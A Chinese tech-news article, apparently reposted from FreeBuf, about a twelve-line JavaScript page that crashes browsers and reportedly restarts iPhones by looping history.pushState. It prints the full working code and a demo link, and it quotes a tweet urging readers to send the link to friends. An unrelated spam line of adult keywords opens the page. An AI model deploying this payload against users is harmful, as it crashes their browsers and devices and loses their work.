自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

這十二行代碼是如何讓瀏覽器爆炸的?

開發(fā) 前端
如果你是移動端(安卓、iPhone)用戶,點開鏈接以后你的瀏覽器會閃退!在微博、微信客戶端點開鏈接同樣會閃退。iPhone 用 Safari 打開之后鏈接之后,手機注銷重啟了!…

起因

今天刷推特的時候發(fā)現(xiàn) Cyber Security@cyber__sec 的推文讓人眼前一亮:

Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit// 使用下面這段 JavaScript 代碼能讓 firefox,chrome,safari 瀏覽器崩潰,而且還能讓 iphone 重啟。

[[162345]]

繼續(xù)在推特上深挖發(fā)現(xiàn) IT Security Tweets ™ @F1r3h4nd 于 17 日發(fā)推:

Crash your friend’s browser and restart Iphone with a link which has this script: #0day

//把帶有下面這個腳本的鏈接發(fā)給你的朋友,能讓你朋友的瀏覽器崩潰,而且讓 Iphone 重啟。

完整 HTML 代碼如下:

  1. <html> 
  2. <body> 
  3. <script> 
  4. var total=""
  5. for (var i=0;i<1000000;i++) 
  7.     total= total+i.toString (); 
  8.     history.pushState (0,0,total); 
  10. </script> 
  11. </body> 
  12. </html> 

demo:(溫馨提示:請保存瀏覽器其它窗口的編輯任務(wù))

www.0xroot.cn/demo.html (點擊一下,又不會懷孕!)

接來下會發(fā)生什么?

點開以后,我的狀態(tài)是這樣的:

[[162346]]

如果你是 PC 端用戶,點開鏈接以后,電腦 CPU 內(nèi)存極有可能一路狂飆直至瀏覽器崩潰卡死!

如果你是移動端(安卓、iPhone)用戶,點開鏈接以后你的瀏覽器會閃退!在微博、微信客戶端點開鏈接同樣會閃退。iPhone 用 Safari 打開之后鏈接之后,手機注銷重啟了!…

思考

這是 Bug 還是 0day?為什么會有這一現(xiàn)象?如何實現(xiàn)的?

責(zé)任編輯:王雪燕 來源: FreeBuf.COM
代碼瀏覽器爆炸
相關(guān)推薦

2016-01-21 10:55:04

2013-07-25 14:17:17

2015-06-11 14:05:46

QQ瀏覽器

2016-09-27 15:51:57

2016-11-11 14:03:01

2020-10-12 08:32:34

瀏覽器進程線程

2021-06-29 10:21:10

Mozilla Firefox 瀏覽器 web安全

2021-01-29 06:15:53

微軟Edge瀏覽器

2009-05-22 08:58:47

微軟IE瀏覽器

2009-03-23 08:52:51

2020-10-30 10:15:21

Chrome V8JavaScript前端

2022-07-07 07:22:01

瀏覽器JavaScript工具

2011-10-17 13:36:54

Chrome命令

2019-12-02 13:46:35

瀏覽器前端開發(fā)

2018-08-30 08:47:59

瀏覽器web服務(wù)器通信

2010-04-05 21:57:14

Netscape瀏覽器

2021-03-12 05:54:47

Edge微軟瀏覽器

2020-08-21 12:47:59

瀏覽器 Chrome Google

2019-03-05 10:48:24

Web瀏覽器前端

2018-12-17 11:40:39

點贊
收藏

51CTO技術(shù)棧公眾號